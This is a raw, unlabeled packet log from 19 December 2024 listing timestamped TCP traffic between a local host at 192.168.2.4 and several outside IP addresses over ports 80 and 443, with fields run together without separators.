                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.449482918 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.449532032 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.450809956 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.450835943 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.450855017 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.450895071 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.452255011 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.452271938 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.452307940 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.452321053 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.453027964 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.453314066 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.453804016 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.453851938 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.454878092 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.454921961 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.455569029 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.455585957 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.455621004 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.455631018 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.456047058 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.456777096 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.456792116 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.456825972 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.456852913 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.458233118 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.458250046 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.458307028 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.459790945 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.459809065 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.459841967 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.459857941 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.460653067 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.461323023 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.461416006 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.461462975 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.462075949 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.462125063 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.462668896 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.462694883 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.462721109 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.462733984 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.463438988 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.463486910 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.463862896 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.463911057 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.464564085 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.464616060 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.465354919 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.466072083 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.466125011 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.466859102 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.466875076 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.466905117 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.466917992 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.468470097 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.468487978 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.468539953 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.469795942 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.469813108 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.469826937 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.469871998 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.469885111 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.470556021 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.471363068 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.471417904 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.472131968 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.472177982 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.472860098 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.473628998 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.473683119 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.474479914 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.474497080 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.474630117 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.474630117 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.475867987 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.475893021 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.475924015 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.475955963 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.477313995 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.477340937 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.477356911 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.477395058 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.477423906 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.478055000 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.479506969 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.479523897 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.479557037 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.479582071 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.480664015 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.480679989 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.480731964 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.481436968 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.481452942 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.481498957 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.482882977 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.482912064 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.482935905 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.482969046 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.483758926 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.483814001 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.484539032 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.484586954 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.485137939 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.485183954 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.485816956 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.488215923 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.488231897 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.488265991 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.488293886 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.535757065 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.597445965 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.597502947 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.597610950 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.597654104 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.597825050 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.597872019 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.598146915 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.598191023 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.598329067 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.598381042 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.598695993 CET804973531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.598812103 CET4973580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.854259014 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.854394913 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.854410887 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.854501009 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.854923964 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.854938984 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.854954004 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.854979992 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.855000019 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:26.921013117 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:27.048274994 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:27.360467911 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:27.360620022 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:27.384354115 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:27.384397984 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:27.503959894 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:27.504060984 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:27.504116058 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:27.504128933 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:27.504194975 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:27.504209042 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:28.517015934 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:28.517116070 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:28.779292107 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:28.850846052 CET4973280192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:28.851134062 CET4974180192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:28.899015903 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:28.977648020 CET8049741185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:28.977663040 CET8049732185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:28.977746964 CET4973280192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:28.977762938 CET4974180192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:28.977972031 CET4974180192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.097484112 CET8049741185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.354298115 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.354320049 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.354434967 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.354446888 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.354460001 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.354497910 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.354563951 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.354578972 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.354617119 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.354763985 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.354777098 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.354788065 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.354799986 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.354816914 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.354818106 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.354826927 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.354854107 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.354871035 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.356040001 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.356065035 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.356133938 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.359452009 CET49742443192.168.2.4104.21.67.146
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.359489918 CET44349742104.21.67.146192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.359569073 CET49742443192.168.2.4104.21.67.146
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.360945940 CET49742443192.168.2.4104.21.67.146
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.360958099 CET44349742104.21.67.146192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.372848988 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.372925043 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.373696089 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.373755932 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.454097033 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.454165936 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.454554081 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.454598904 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.463936090 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.463948965 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.463993073 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.479125023 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.479136944 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.479191065 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.495487928 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.495511055 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.495846033 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.496501923 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.496522903 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.496829033 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.499687910 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.499701977 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.499749899 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.513505936 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.513650894 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.513706923 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.528247118 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.528315067 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.678889990 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.678963900 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.686255932 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.686269999 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.686506987 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.686537027 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.686548948 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.686584949 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.686608076 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.686983109 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.686995029 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.687024117 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.687047958 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.687274933 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.687289000 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.687299967 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.687319994 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.687320948 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.687328100 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.687346935 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.687364101 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.687382936 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.687396049 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.687417030 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.687419891 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.687433958 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.687438011 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.687457085 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.687477112 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.687683105 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.687695026 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.687706947 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.687717915 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.687721014 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.687731981 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.687756062 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.687855005 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.687868118 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.687880039 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.687891960 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.687894106 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.687903881 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.687916040 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.687923908 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.687928915 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.687941074 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.687952042 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.687952995 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.687962055 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.687963963 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.687994003 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.688019991 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.688133001 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.688146114 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.688209057 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.688220978 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.688523054 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.692184925 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.692240000 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:29.692389965 CET8049737185.215.113.206192.168.2.4
